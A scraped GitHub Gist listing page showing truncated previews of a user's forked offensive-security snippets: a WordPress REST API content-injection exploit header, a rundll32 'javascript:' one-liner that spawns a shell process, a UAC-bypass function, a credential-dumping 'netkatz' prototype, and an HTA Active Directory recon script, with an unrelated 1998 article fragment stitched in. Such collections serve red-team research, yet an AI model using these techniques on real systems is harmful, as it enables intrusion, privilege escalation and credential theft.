Skip to content

Instantly share code, notes, and snippets.

@DanielRTeixeira
DanielRTeixeira / Sample Key
Last active June 19, 2016 16:30
Sample Key
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCvXIGeuwHQzt0XVyRBA9/bCK7j9b4celVVd5ATSr/6Ev6QiBagf+d11l71Eqhznddzgi5+hEB+j5VPJq+4EjdD7JLnVjd/kxd4xkCFjkWsjEY9Vh41kZDoB3F0z92zkwHIx/wVtJJdq6vUX1Q9TMSRjQrA+XpdotSU+2Q/lBP12QIDAQAB
@DanielRTeixeira
DanielRTeixeira / wordpress_content_injection.py
Created May 19, 2017 11:16 — forked from budanthara/wordpress_content_injection.py
Wordpress content injection exploit by snoww0lf
#! /usr/bin/env python
"""
Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
Wordpress Version Affected: 4.7.0/4.7.1
2017 - Coded by snoww0lf.
"""
import re
@DanielRTeixeira
DanielRTeixeira / dgconfig.ps1
Created November 2, 2017 15:23 — forked from nicholasmckinney/dgconfig.ps1
Sample Device Guard Configuration
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID }
$d = $s2.DeviceObject + "\"
cmd /c mklink /d C:\scpy "$d"
New-CIPolicy -Level LeafCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs
$s2.Delete()
Remove-Item -Path C:\scpy -Force
Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
An Automation Object for Dynamic DLL Calls
Here's an OLE automation object for dynamically declaring and accessing functions in external DLLs 


November 01, 1998
URL:http://www.drdobbs.com/windows/an-automation-object-for-dynamic-dll-cal/210200078 

Jeff Stong has been developing DOS, Windows, and Windows NT based applications for 10 years. Jeff can be contacted at Jeff_V_Stong@msn.com.
You can access external DLLs from Visual Basic by using the Declare statement to declare the name of the function you want to call and the DLL that it resides in. VBScript, however, doesn't support the Declare statement. This article presents an OLE automation object that lets VBScript (or any other environment that can access automation objects) dynamically declare and access functions in external DLLs.
Using the DynamicWrapper Object
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.Exec(\"calc\")");
@DanielRTeixeira
DanielRTeixeira / netkatz.cs
Created November 2, 2017 15:23 — forked from nicholasmckinney/netkatz.cs
Prototype - x86
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@DanielRTeixeira
DanielRTeixeira / _commands.txt
Created November 2, 2017 15:23 — forked from nicholasmckinney/_commands.txt
Basic Example of Binary Patching With MPatch.exe and APatch.exe
#Build Your Binaries
c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe a.cs
c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe b.cs
c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe c.cs
# Create Your Patch
# You need Windows 7 SDK
"C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin\mpatch.exe" a.exe b.exe dbi_patch
function Invoke-WScriptBypassUAC
{
<#
.SYNOPSIS
Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.
Author: @enigma0x3, @harmj0y, Vozzie
License: BSD 3-Clause
Required Dependencies: None
@DanielRTeixeira
DanielRTeixeira / recon.hta
Created November 2, 2017 15:23 — forked from nicholasmckinney/recon.hta
JavaScript AD Enumeration
<html>
<head>
<script Language = JavaScript>
//-----------------------------------------------------------------------------------------------
// adSiteInfo.js
//
//-----------------------------------------------------------------------------------------------
var objADSysInfo = new ActiveXObject("ADSystemInfo");
var objNetwork = new ActiveXObject("WScript.Network");
var objRootDSE = null;